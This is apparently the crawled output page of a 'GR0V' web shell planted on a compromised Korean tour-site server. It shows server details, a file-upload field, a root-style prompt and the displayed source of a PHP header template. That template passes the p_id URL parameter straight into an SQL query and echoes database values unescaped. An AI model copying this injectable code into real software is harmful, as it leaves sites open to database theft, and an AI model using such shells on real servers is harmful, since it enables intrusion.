? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/gall/template/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html_bk/gall/template/header.php

<? session_start();?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="en">
<? include("include/db.class.php");?>
<? include("include/module.php");?>
<head>

<? 
$url = $_SERVER['PHP_SELF'];
$url = explode("/",$url);
$page = $url[count($url)-1];
$page = explode(".",$page );
$page = $page[0];

 if($page=="read"){
	 $page="article";
 }
$seo = $db->queryUniqueObject("select seo_data from seo where seo_page = '".$page."'");
$tag = explode(",",$seo->seo_data);
 
 if(isset($_GET[p_id])){
	$seo = $db->queryUniqueObject("select * from product  where p_id = ".$_GET[p_id]."");	 
	$tag[0]=$seo->f1288868373;
	$tag[1]=$seo->f1290417918;
	$tag[2]=$seo->f1288868477;
 }
 if($tag[0]==""){
	$seo = $db->queryUniqueObject("select seo_data from seo where seo_page = 'main'");
$tag = explode(",",$seo->seo_data); 
 }
?>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title><? echo $tag[0]?></title>
<meta name="keywords" content="<? echo $tag[1]?>" /> 
<meta name="description" content="<? echo $tag[2]?>" />
<meta property="og:image" content="http://www.drynjoy.com/clip/images/thumb.png" /> 
<!--<base href="http://www.downloads-templates.com/OS/300110329/">-->
<link rel="stylesheet" type="text/css" href="css/stylesheet.css">
<? if(isset($_GET[logoff])){
session_destroy();
echo "<script>window.location.href='main.php';</script>";
}
?>
<style type="text/css">
<!--
.style1 {color: #FFFFFF}
body {
	background-color: #CAF5FC;
	background-image: url(images/bgpost2.jpg);
	background-repeat: no-repeat;
	margin-right: 200px;
	margin-top: 300px;
	margin-left: 200px;
}
-->
</style>
</head>


<!-- header //-->

<center>
</center>
<!-- header_eof //-->
 
<!-- body //-->
<tr>
  <td width="100%" valign="top">

T1KUS90T
  root-grov@210.1.60.28:~$